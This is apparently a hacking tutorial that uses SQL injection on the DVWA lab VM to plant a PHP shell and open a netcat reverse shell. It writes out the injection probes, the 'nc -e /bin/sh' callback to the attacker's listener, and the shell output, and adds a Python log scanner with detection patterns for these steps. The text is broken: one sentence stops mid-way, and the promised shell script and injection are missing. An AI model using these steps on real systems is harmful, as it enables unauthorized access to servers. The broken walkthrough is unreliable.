One of the ultimate goals in hacking is the ability to obtain shells in order to run system commands and own a target or network. SQL injection is typically associated with databases and their data, but it can actually be used as a vector to gain a command shell.
In this tutorial we use DVWA, an intentionally vulnerable virtual machine, and Kali Linux to carry out the attack. SQL injection is one of the most common web vulnerabilities.
There are many different types of SQL injection and different attack methods for the various database systems in use. Although this type of attack is one of the easiest to get started with, SQL injection can take years to truly master.
Step 1: Target Enumeration
The first thing we need to do is log in to DVWA using the default credentials: admin as the username and password as the password.
Next, go to the "Security" tab on the left, and set the security level to "low."
Navigate to the "SQL Injection" page to begin our attack.
We want to verify that the input is actually vulnerable to SQL injection. Entering a single quote as the user ID will close the quoted string prematurely if the input is indeed vulnerable. When we do this, we see that it returns an error, even telling us that it is using MySQL as the database.
select first_name, surname from users where user_id = '';
This is probably what the query looks like on the backend, with first_name and surname being the selected columns, for a total of two columns. But we need to know for sure in order for this to work. For that, we can use the order by clause.
This clause sorts the results of the query by the given column number. Since we are pretty sure there are at least two columns in use, ordering by 1 or 2 should complete successfully. But what if we order by 3? If we are correct, that query should throw an error.
Submit the following injection as input, and it should result in an error.
'order by 3 #
We can see that we do not get any error, so now we
Step 2: Shell Access & Command Execution
Now that we have a little more information about the database, we can use this to our advantage to perform a union-based SQL injection. The union operator combines the results of two or more select statements, provided they return the same number of columns.
There are many things we can do with union-based injections, but this tutorial focuses on using them to run OS commands.
We need to determine the root directory of the web server in order to upload our shell. Depending on the application and the type of web server in use, this can vary, especially if an admin has changed the default location or adequate permissions are in place. For the purposes of this demo, we will assume that the default Apache web root (/var/www/) has public write permissions. Information about the web server, including the root directory, can usually be found in the "phpinfo.php" file.
We can use the into outfile command to write to a file. In this case, we want to insert a simple PHP script, which will be able to run system commands. The script, which we will aptly name "cmd.php," should look like this:
Now, let's perform the injection. Keep the second part of the statement in single quotes; this will avoid syntax errors.
First, set up the listener on our local machine. Use the nc command with the flags -l, -v, and -p to listen, be verbose, and set the port number, respectively.
nc -lvp 1234
listening on [any] 1234 ...
Next, as the parameter to our PHP shell in the URL, enter the following command. It tells the server to execute a shell (-e /bin/sh) and connect it back to our local machine.
nc 172.16.1.100 1234 -e /bin/sh
Give it a few seconds, and we should see our listener catch the shell and open a connection. From here we can run commands such as id, uname -a, and ps as we see fit.
connect to [172.16.1.100] from (UNKNOWN) [172.16.1.102] 47643
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
  PID TTY          TIME CMD
 4665 ?        00:00:00 apache2
 4669 ?        00:00:00 apache2
 4671 ?        00:00:00 apache2
 4673 ?        00:00:00 apache2
 4674 ?        00:00:00 apache2
 4803 ?        00:00:00 apache2
 4810 ?        00:00:00 apache2
 4914 ?        00:00:00 php
 4915 ?        00:00:00 sh
 4919 ?        00:00:00 ps
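From the defender's side, every stage of this chain leaves a trace in the web server's access log. The following is an added example, not part of the original tutorial: a small Python scanner that parses Apache access-log lines (the sample lines are constructed, not captured traffic) and tags the quote probe, the ORDER BY probing, the UNION ... INTO OUTFILE write into the web root, and the netcat reverse shell driven through the dropped cmd.php. The log format, request paths and timestamps are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache access-log lines (not real traffic) mirroring this tutorial:
# quote probe, ORDER BY probing, UNION ... INTO OUTFILE into the web root, then
# the dropped cmd.php driven with a netcat reverse shell. No PHP body is included.
SAMPLE_LOG = """\
172.16.1.100 - - [10/Apr/2018:13:58:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321
172.16.1.100 - - [10/Apr/2018:13:58:05 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit HTTP/1.1" 200 1290
172.16.1.100 - - [10/Apr/2018:13:58:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%27order+by+3+%23&Submit=Submit HTTP/1.1" 200 1301
172.16.1.100 - - [10/Apr/2018:13:58:20 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%27+union+select+1%2C2+into+outfile+%27%2Fvar%2Fwww%2Fcmd.php%27+%23&Submit=Submit HTTP/1.1" 200 1301
172.16.1.100 - - [10/Apr/2018:13:58:31 +0000] "GET /cmd.php?cmd=nc+172.16.1.100+1234+-e+%2Fbin%2Fsh HTTP/1.1" 200 0
"""

# Common Log Format: client ip, identd, user, [timestamp], "METHOD path proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d+)'
)

# Signatures run against the URL-decoded, lowercased query string, so
# encoding the payload (%27, +, %2F) does not hide it from the scanner.
SIGNATURES = [
    ("sqli-probe",   re.compile(r"(^|=)'(&|$)")),            # bare quote as a value
    ("sqli-orderby", re.compile(r"'\s*order\s+by\s+\d+")),    # column-count probing
    ("sqli-union",   re.compile(r"union\s+(all\s+)?select")),
    ("sqli-outfile", re.compile(r"into\s+(out|dump)file")),   # needs FILE privilege; restrict with secure_file_priv
    ("revshell-nc",  re.compile(r"\bnc\b.*\s-e\s*/bin/(ba)?sh")),
]

def classify(line):
    """Return (ip, path, tags) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, raw_query = m.group("path").partition("?")
    query = unquote_plus(raw_query).lower()
    tags = [name for name, rx in SIGNATURES if rx.search(query)]
    return m.group("ip"), path, tags

def scan(log_text):
    """Return only the flagged requests as a list of (ip, path, tags)."""
    hits = []
    for line in log_text.splitlines():
        rec = classify(line)
        if rec and rec[2]:
            hits.append(rec)
    return hits
```

A hit tagged sqli-outfile followed by requests to a new PHP file in the web root is the sequence to alert on; a web root that the MySQL user cannot write to, and a non-empty secure_file_priv, stop the write in the first place.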
In this guide, we learned how to identify a vulnerable SQL injection point, enumerate the backend database, and use that information to upload a simple shell to the target system and get a reverse shell, giving backdoor access to the web server.
Cover image by NewPaddy / Pixabay; Screenshots by drd_ / Null Byte